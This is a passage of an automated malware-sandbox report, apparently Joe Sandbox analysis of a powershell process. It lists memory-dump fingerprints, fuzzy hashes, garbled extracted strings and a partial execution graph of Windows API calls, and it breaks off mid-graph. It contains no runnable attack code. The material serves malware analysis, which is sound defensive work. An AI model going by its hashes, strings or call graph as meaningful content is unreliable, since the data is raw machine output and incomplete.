                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 47e3b461ec6e7301a819d4507d2588a4e0b17a0cf7af5bc78b7a7080ef2ebea4
                                                                                                                  • Instruction ID: 32a698f11b8389767530f0844c01819ab2bcb317a06e724f09d8831e80f4702b
                                                                                                                  • Opcode Fuzzy Hash: 47e3b461ec6e7301a819d4507d2588a4e0b17a0cf7af5bc78b7a7080ef2ebea4
                                                                                                                  • Instruction Fuzzy Hash: 50F06D709013184BD760DF78D49C39ABBE9EB44310F10446DE61ED7340DB396981CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3bf0cd6b93729c69d6d576b5308dab29e8b86530a5a0b37a436ef56b64a9d61c
                                                                                                                  • Instruction ID: fb44ccdd7755f8a570c973a2c93578e47527b47ae72e8eeb5507033a18aa35bd
                                                                                                                  • Opcode Fuzzy Hash: 3bf0cd6b93729c69d6d576b5308dab29e8b86530a5a0b37a436ef56b64a9d61c
                                                                                                                  • Instruction Fuzzy Hash: 00E0203530422847CF09B774D40C2DDBA56EBC4724F00006ED609C7342CF78190283D6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e2d88fb22b508c43493608ee22fd76dcb6309afa6956c2fff91dae76abe95d8d
                                                                                                                  • Instruction ID: 5bb199fab7184b6508097efaeb1c5cc788cdd90db303683d67393090dba548cd
                                                                                                                  • Opcode Fuzzy Hash: e2d88fb22b508c43493608ee22fd76dcb6309afa6956c2fff91dae76abe95d8d
                                                                                                                  • Instruction Fuzzy Hash: C6D0C7167432351745A4F1FE19106FBA5CE8EC94B57094177EA09CB749EE74CC1147F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7f259e7ec01dd3cc20fbd85f5508a7124460cb9507453411f598d9a96dbfe553
                                                                                                                  • Instruction ID: ee3c38294b4c2c5ba0491ad5b608341b0e73f521206b67158d6ae7cd356ce66d
                                                                                                                  • Opcode Fuzzy Hash: 7f259e7ec01dd3cc20fbd85f5508a7124460cb9507453411f598d9a96dbfe553
                                                                                                                  • Instruction Fuzzy Hash: 09E0C231301619478612A62EA81085F77DADFC5671325483EF00DC7344DF64DD064BE6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                  • Instruction ID: fb31d0452a9f54b0b746e24eda7dbbcb690bd60ade88ac6959e085d0a0226c60
                                                                                                                  • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                  • Instruction Fuzzy Hash: F0E08631B00014978B08E699D4505DDF7A5DBCC220F04847FD90AA7340DA32691686D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5138f69d37f4ad612d774c3ea0d7c6360b9ad46965d0d28fb38f33ca368a2a67
                                                                                                                  • Instruction ID: bcc29c41809f837e2bb2313f39a1eec4b79095930d876b00d16ad3e8e6dea922
                                                                                                                  • Opcode Fuzzy Hash: 5138f69d37f4ad612d774c3ea0d7c6360b9ad46965d0d28fb38f33ca368a2a67
                                                                                                                  • Instruction Fuzzy Hash: 25E04F3180815D9BCF49EBB4D85A4EE7F34EB15301B5044DCDA9782192DA615947CBC1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5026475bdec0111314593d5015c25687f39f7b6c14e85a6535ab186177d90061
                                                                                                                  • Instruction ID: a1e105145584f444f5a285abdceb313b20d5853d1078579cf952cd1fc6b466fe
                                                                                                                  • Opcode Fuzzy Hash: 5026475bdec0111314593d5015c25687f39f7b6c14e85a6535ab186177d90061
                                                                                                                  • Instruction Fuzzy Hash: 55E0C23230A1901F8745637CA8144ADBFE1EBD63A131900BFF68AC3383DA15CC06C7A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c7c0fd7273df279c72b9df987bcbd9068990398271a3017f8047d1453f8683fd
                                                                                                                  • Instruction ID: 615cd981ba4e9cdf902565fb318ed611668a2df06d12fe3bea64f2cffe784df2
                                                                                                                  • Opcode Fuzzy Hash: c7c0fd7273df279c72b9df987bcbd9068990398271a3017f8047d1453f8683fd
                                                                                                                  • Instruction Fuzzy Hash: D0E04F30D0924A9BCB59DBB8D44686FFFB0EB46214B2482ADD98AD7207D6311846CF81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 109c19b6751b359c259344b887fcd5789d5006e23e7c54771d27f66d66e5171c
                                                                                                                  • Instruction ID: fa13be46375141c28c96b88afab39dc45c01b90a1696406fb5da297f8902c705
                                                                                                                  • Opcode Fuzzy Hash: 109c19b6751b359c259344b887fcd5789d5006e23e7c54771d27f66d66e5171c
                                                                                                                  • Instruction Fuzzy Hash: 5ED0A7313010141B4604636DF40545977D9D7C9662311007FF60DC3341DF21DC0683E5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e42eea119187de022c35655fff951ee820c44af95f0cbe4fc0a5b3c87cb116b0
                                                                                                                  • Instruction ID: 44e8f0860158657190e203e1c075f7e77301655e1a607f86fe2f5d42bdbedcbb
                                                                                                                  • Opcode Fuzzy Hash: e42eea119187de022c35655fff951ee820c44af95f0cbe4fc0a5b3c87cb116b0
                                                                                                                  • Instruction Fuzzy Hash: DEE04F70D042469FCB80DFBD88415ADFFF0EB4A340B1086AEC949D7605E3328612CF81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                  • Instruction ID: 649ec2134012922d1e4c5d20032c3d33a6cf68edec46c707bb4bdee00eb93e10
                                                                                                                  • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                  • Instruction Fuzzy Hash: B2D067B0D0520A9F8780EFADD94156EFBF4EB48200F6085AA8919E7701E7329A12CBD1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1688cd930c972c35a99895f101dcc18a1223c8fcf7275313035d0e36112d0938
                                                                                                                  • Instruction ID: c9099b86946a16bc9da5c28563f43cd61adc8e6cdb0e4825e8627e361587cd74
                                                                                                                  • Opcode Fuzzy Hash: 1688cd930c972c35a99895f101dcc18a1223c8fcf7275313035d0e36112d0938
                                                                                                                  • Instruction Fuzzy Hash: 9CD0173080411D8BCF48EBA4E81A4BEBB34FA10301F5041ADD91792191EA701A4ACBC0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6eab1c65750909862be435efefc17315a899032bf6553e3fe5d3263517e2ec99
                                                                                                                  • Instruction ID: ca2aed8bfb831c80d66a7ea1ec9d59e742ef135dac2746710ae08a9f33700013
                                                                                                                  • Opcode Fuzzy Hash: 6eab1c65750909862be435efefc17315a899032bf6553e3fe5d3263517e2ec99
                                                                                                                  • Instruction Fuzzy Hash: C0D01734A0820E8F8B48EFA4E44A86EBBB5EB45200F1081A9DD49D3344EA306901CBC1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 04a56d189181ed6481c49ba75a64e233f48e544dc6f241ccb8ed46e05357d933
                                                                                                                  • Instruction ID: 348ad7fa04d313d05675e2ecdec203d11399a778538b2a892d9237785637550a
                                                                                                                  • Opcode Fuzzy Hash: 04a56d189181ed6481c49ba75a64e233f48e544dc6f241ccb8ed46e05357d933
                                                                                                                  • Instruction Fuzzy Hash: 89D0C7715097C19FDB0EAF74D9A84107F34AE0730431604CFD4964F1B3CA365589CB15
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5f7c88a0363a16d39513091479649302b91888f441f0a387a4373b98f318b639
                                                                                                                  • Instruction ID: 94edb498033a5c43cda787feedf4eec2b9390b70a2f7cf1c6d6e3f166472965f
                                                                                                                  • Opcode Fuzzy Hash: 5f7c88a0363a16d39513091479649302b91888f441f0a387a4373b98f318b639
                                                                                                                  • Instruction Fuzzy Hash: 28C04C764496805FFB0B9B249A69A057F75A91330430B11CAD083CB8B2C7650947CF22
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7aef8cb987d8e5d2d98b0e14884000cbe4857b1dfbc0709a5de8c41c153f70ab
                                                                                                                  • Instruction ID: 40b6d7021357b76237f26e0bac1bfcded08ba228b22c9abf2fbc73b579ce58f4
                                                                                                                  • Opcode Fuzzy Hash: 7aef8cb987d8e5d2d98b0e14884000cbe4857b1dfbc0709a5de8c41c153f70ab
                                                                                                                  • Instruction Fuzzy Hash: 67B092300447088FC6486F79A804814732DEB4561939004ECE94F0A292CE36E989CA45
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-1910532044
                                                                                                                  • Opcode ID: 4203dd50d81414e3d99359f8560ffbeb46c4915862bf587b8109254d2b9163eb
                                                                                                                  • Instruction ID: bce8ab56de2c3acb606b41a47372f5de5d917890f091c289f1a411b76ec2dbc7
                                                                                                                  • Opcode Fuzzy Hash: 4203dd50d81414e3d99359f8560ffbeb46c4915862bf587b8109254d2b9163eb
                                                                                                                  • Instruction Fuzzy Hash: B9A167B17042459FCB649F698C5076ABBE2AFD6724F1480AFD445CB3D2CA35C881C7E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4']q$4']q$4']q$4']q$piyj$tP]q$tP]q
                                                                                                                  • API String ID: 0-2327987307
                                                                                                                  • Opcode ID: c275c7bbc43d0b02249538e6c42a79f9cf313a0d9511e57c2086ade8fe1e484e
                                                                                                                  • Instruction ID: 4de777a2c871d1c2c790fec437a371a8a97c45372393a7642554181faf59b61c
                                                                                                                  • Opcode Fuzzy Hash: c275c7bbc43d0b02249538e6c42a79f9cf313a0d9511e57c2086ade8fe1e484e
                                                                                                                  • Instruction Fuzzy Hash: C7D12BB1F0424A8FCB659F6C984866EBBE2BF96321F1480BBD545CB291DB31C885C7D1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-2353078639
                                                                                                                  • Opcode ID: 7e5c142f489235ddc283aadd9c66291e8df374065b9832ebb6d0945aa765041a
                                                                                                                  • Instruction ID: 40fb8a791175af2e00cea0c549e6d295c4f591db4d32c6bfb4d1fe620e50fd48
                                                                                                                  • Opcode Fuzzy Hash: 7e5c142f489235ddc283aadd9c66291e8df374065b9832ebb6d0945aa765041a
                                                                                                                  • Instruction Fuzzy Hash: FD5188F570834A9FDB644E298C04766BBA2AFE6615F2480BFD445CB6C1DB35C881C7E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `^q$`^q$`^q$`^q
                                                                                                                  • API String ID: 0-4294711580
                                                                                                                  • Opcode ID: 496028f319de48662a0bd06fbcc46df52078c80cf08e17fe731153644b13a921
                                                                                                                  • Instruction ID: 9a11e16b8fceb38c09d6011bec1446e53ee5873e7d3ce25f7bde8305460c2f70
                                                                                                                  • Opcode Fuzzy Hash: 496028f319de48662a0bd06fbcc46df52078c80cf08e17fe731153644b13a921
                                                                                                                  • Instruction Fuzzy Hash: 52B1CC74E012099FCB45DFA9D590A9DFBF2FF48304F208629E819AB315DB34A945CF90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `^q$`^q$`^q$`^q
                                                                                                                  • API String ID: 0-4294711580
                                                                                                                  • Opcode ID: cc76e13aeef6755d3b0502a5f30f46f4a6679158044b46edfffd41421562135d
                                                                                                                  • Instruction ID: 6232ec21c419474c8cfed99efdcee4985f2bee042a59349f2aae3278fd2687fe
                                                                                                                  • Opcode Fuzzy Hash: cc76e13aeef6755d3b0502a5f30f46f4a6679158044b46edfffd41421562135d
                                                                                                                  • Instruction Fuzzy Hash: E9B1BA74E012099FCB54DFA9D590A9DFBF2FF88304F208629E819AB305DB35A945CF90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_3060000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `^q$`^q$`^q$`^q
                                                                                                                  • API String ID: 0-4294711580
                                                                                                                  • Opcode ID: 129b33219622bacfcd9c89c6020e38f1756adb385d4d1f8fa10781b1b22b06e5
                                                                                                                  • Instruction ID: 06107823c2a0a63330d6bcc10c66613787d0f777fd150078499a865528b33739
                                                                                                                  • Opcode Fuzzy Hash: 129b33219622bacfcd9c89c6020e38f1756adb385d4d1f8fa10781b1b22b06e5
                                                                                                                  • Instruction Fuzzy Hash: 4BA1A874E012198FCB54DFA9D590A9DFBF2FF48304F24862AE819AB305DB34A955CF90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-858218434
                                                                                                                  • Opcode ID: e70a53f38a5d8b0a175b8add843f796735654b35756d552e40446f951ff59a0f
                                                                                                                  • Instruction ID: 0cb7d0f4fddf993a93aa4b3e73fecd7629b098f00ff63b1ca50cab33650ae6f9
                                                                                                                  • Opcode Fuzzy Hash: e70a53f38a5d8b0a175b8add843f796735654b35756d552e40446f951ff59a0f
                                                                                                                  • Instruction Fuzzy Hash: 902147F131420A9BDBB8592A8C44F67BBDBABE0715F24802AA905CB2C1DD35C8518BB1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_11_2_7800000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4']q$4']q$$]q$$]q
                                                                                                                  • API String ID: 0-978391646
                                                                                                                  • Opcode ID: f6b4c26ed8f3602a2c1779af3a019c2acb169350d718439dcd147d6debd9c310
                                                                                                                  • Instruction ID: 49f4ce859b94db263025c68ef83ffb1233e63a39a7e2f107187f51ede43a08db
                                                                                                                  • Opcode Fuzzy Hash: f6b4c26ed8f3602a2c1779af3a019c2acb169350d718439dcd147d6debd9c310
                                                                                                                  • Instruction Fuzzy Hash: 91018F6170E3D64FC72B16381C61665AFB66F93614B2F41D7C081DB293CA194C45C3E7

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:11.7%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:478
                                                                                                                  Total number of Limit Nodes:44
                                                                                                                  execution_graph 31085 65b6718 31086 65b6728 31085->31086 31090 65bd46a 31086->31090 31096 65bd478 31086->31096 31087 65b6751 31091 65bd478 31090->31091 31102 65b7d60 31091->31102 31093 65bd502 31114 65bb930 31093->31114 31095 65bd509 31095->31087 31097 65bd4ad 31096->31097 31098 65b7d60 8 API calls 31097->31098 31099 65bd502 31098->31099 31100 65bb930 8 API calls 31099->31100 31101 65bd509 31100->31101 31101->31087 31105 65b7d8c 31102->31105 31104 65b6890 8 API calls 31106 65b816c 31104->31106 31113 65b7fc4 31105->31113 31124 65b798c 31105->31124 31106->31093 31107 65b7e45 31108 65b6890 8 API calls 31107->31108 31112 65b7eed 31107->31112 31109 65b7eb7 31108->31109 31110 65b6890 8 API calls 31109->31110 31110->31112 31130 65b6890 31112->31130 31113->31104 31113->31106 31115 65bb93b 31114->31115 31116 65bd72f 31115->31116 31117 65bd767 31115->31117 31123 65bd736 31115->31123 31118 65b6890 8 API calls 31116->31118 31119 65bd7b8 31117->31119 31120 65bd78c 31117->31120 31118->31123 31122 65b6890 8 API calls 31119->31122 31121 65b6890 8 API calls 31120->31121 31121->31123 31122->31123 31123->31095 31127 65b7997 31124->31127 31125 65b8307 31125->31107 31126 65b6890 8 API calls 31129 65b82c9 31126->31129 31127->31125 31128 65b6890 8 API calls 31127->31128 31127->31129 31128->31129 31129->31125 31129->31126 31131 65b68a0 31130->31131 31132 65b68dd 31131->31132 31135 65badd9 31131->31135 31160 65bade8 31131->31160 31132->31113 31139 65bade6 31135->31139 31136 65baf1b 31137 65b2208 8 API calls 31136->31137 31146 65baef0 31136->31146 31137->31146 31139->31136 31141 65baebf 31139->31141 31185 65b2208 31141->31185 31143 65baf35 31213 65b8e88 31143->31213 31193 65b8ef4 31146->31193 31147 65baf3d 31148 65bb047 31147->31148 31149 65b6890 8 API calls 31147->31149 31217 65b16c0 31148->31217 31224 65b16b0 31148->31224 31150 65bafed 31149->31150 31239 65b4088 31150->31239 31151 65bb0a8 31231 65ba8c1 31151->31231 31235 65ba8d0 31151->31235 31153 65bb0bc 31154 65bb010 31154->31148 31242 65b8f64 31154->31242 31164 65badeb 31160->31164 31161 65baf1b 31162 65b2208 8 API calls 31161->31162 31171 65baef0 31161->31171 31162->31171 31163 65b8ef4 8 API calls 31165 65baf2b 31163->31165 31164->31161 31166 65baebf 31164->31166 31167 65b8f04 8 API calls 31165->31167 31170 65b2208 8 API calls 31166->31170 31168 65baf35 31167->31168 31169 65b8e88 8 API calls 31168->31169 31172 65baf3d 31169->31172 31170->31171 31171->31163 31173 65bb047 31172->31173 31174 65b6890 8 API calls 31172->31174 31181 65b16c0 2 API calls 31173->31181 31182 65b16b0 2 API calls 31173->31182 31175 65bafed 31174->31175 31177 65b4088 SetWindowLongW 31175->31177 31176 65bb0a8 31183 65ba8c1 8 API calls 31176->31183 31184 65ba8d0 8 API calls 31176->31184 31179 65bb010 31177->31179 31178 65bb0bc 31179->31173 31180 65b8f64 8 API calls 31179->31180 31180->31173 31181->31176 31182->31176 31183->31178 31184->31178 31187 65b2347 31185->31187 31188 65b2239 31185->31188 31186 65b2245 31186->31146 31187->31146 31188->31186 31249 65b2f38 31188->31249 31254 65b2f27 31188->31254 31195 65b8eff 31193->31195 31194 65baf2b 31199 65b8f04 31194->31199 31195->31194 31196 65b6890 8 API calls 31195->31196 31197 65bd9f0 31196->31197 31198 65b4088 SetWindowLongW 31197->31198 31198->31194 31200 65b8f0f 31199->31200 31202 65bdf21 31200->31202 31209 65bdf74 31200->31209 31212 65bdfa8 31200->31212 31276 65bba14 8 API calls 31200->31276 31201 65bdf5a 31204 65b8f64 8 API calls 31201->31204 31202->31201 31203 65b8f64 8 API calls 31202->31203 31205 65bdf4c 31203->31205 31206 65bdf66 31204->31206 31270 65bda44 31205->31270 31208 65bda44 8 API calls 31206->31208 31208->31209 31210 65b6890 8 API calls 31209->31210 31209->31212 31210->31212 31212->31143 31214 65b8e93 31213->31214 31215 65b6890 8 API calls 31214->31215 31216 65ba914 31214->31216 31215->31216 31216->31147 31218 65b16e5 31217->31218 31220 65b16df 31217->31220 31218->31151 31219 65b1818 KiUserCallbackDispatcher 31219->31218 31220->31218 31220->31219 31280 6630ac9 31220->31280 31284 6630ad8 31220->31284 31225 65b16e5 31224->31225 31226 65b16df 31224->31226 31225->31151 31226->31225 31227 65b1818 KiUserCallbackDispatcher 31226->31227 31229 6630ac9 SetWindowLongW 31226->31229 31230 6630ad8 SetWindowLongW 31226->31230 31227->31225 31229->31227 31230->31227 31232 65ba8d0 31231->31232 31233 65b8e88 8 API calls 31232->31233 31234 65ba8e4 31233->31234 31234->31153 31236 65ba8dd 31235->31236 31237 65b8e88 8 API calls 31236->31237 31238 65ba8e4 31237->31238 31238->31153 31288 65b1b7c 31239->31288 31244 65b8f6f 31242->31244 31243 65bfbee 31243->31148 31244->31243 31245 65b6890 8 API calls 31244->31245 31246 65bfc48 31245->31246 31247 65be460 SendMessageW 31246->31247 31248 65bfc59 31247->31248 31248->31148 31250 65b2f63 31249->31250 31251 65b3012 31250->31251 31259 65b3e10 31250->31259 31263 65b3e20 31250->31263 31255 65b2f38 31254->31255 31256 65b3012 31255->31256 31257 65b3e10 CreateWindowExW 31255->31257 31258 65b3e20 CreateWindowExW 31255->31258 31257->31256 31258->31256 31260 65b3e20 31259->31260 31266 65b1b40 31260->31266 31264 65b1b40 CreateWindowExW 31263->31264 31265 65b3e55 31264->31265 31265->31251 31267 65b3e70 CreateWindowExW 31266->31267 31269 65b3f94 31267->31269 31271 65bda4f 31270->31271 31272 65bfc48 31271->31272 31273 65b6890 8 API calls 31271->31273 31277 65be460 31272->31277 31273->31272 31276->31202 31278 65bfc70 SendMessageW 31277->31278 31279 65bfc59 31278->31279 31279->31201 31281 6630ae8 31280->31281 31283 65b4088 SetWindowLongW 31281->31283 31282 6630afa 31282->31219 31283->31282 31285 6630ae8 31284->31285 31287 65b4088 SetWindowLongW 31285->31287 31286 6630afa 31286->31219 31287->31286 31289 65b40b8 SetWindowLongW 31288->31289 31290 65b40a0 31289->31290 31290->31154 31554 65be108 31555 65be119 31554->31555 31558 65be183 31555->31558 31559 65bdaac 31555->31559 31561 65bdab7 31559->31561 31560 65be17c 31561->31560 31564 65bf898 31561->31564 31570 65bf8a8 31561->31570 31576 65be41c 31564->31576 31567 65bf8cf 31567->31560 31568 65bf8f6 CreateIconFromResourceEx 31569 65bf976 31568->31569 31569->31560 31571 65be41c CreateIconFromResourceEx 31570->31571 31572 65bf8bf 31571->31572 31573 65bf8cf 31572->31573 31574 65bf8f6 CreateIconFromResourceEx 31572->31574 31573->31560 31575 65bf976 31574->31575 31575->31560 31577 65bf8f8 CreateIconFromResourceEx 31576->31577 31578 65bf8bf 31577->31578 31578->31567 31578->31568 31579 65b9108 31580 65b911f 31579->31580 31582 65b8cd8 31579->31582 31583 65b8ce3 31582->31583 31584 65b91d8 31583->31584 31588 65b91e9 31583->31588 31593 65b91f8 31583->31593 31584->31580 31585 65b91a2 31585->31580 31590 65b91f6 31588->31590 31591 65b943d 31590->31591 31598 65b9659 31590->31598 31591->31585 31595 65b91fe 31593->31595 31594 65b9473 31594->31585 31596 65b943d 31595->31596 31597 65b9659 8 API calls 31595->31597 31596->31585 31597->31594 31599 65b9697 31598->31599 31600 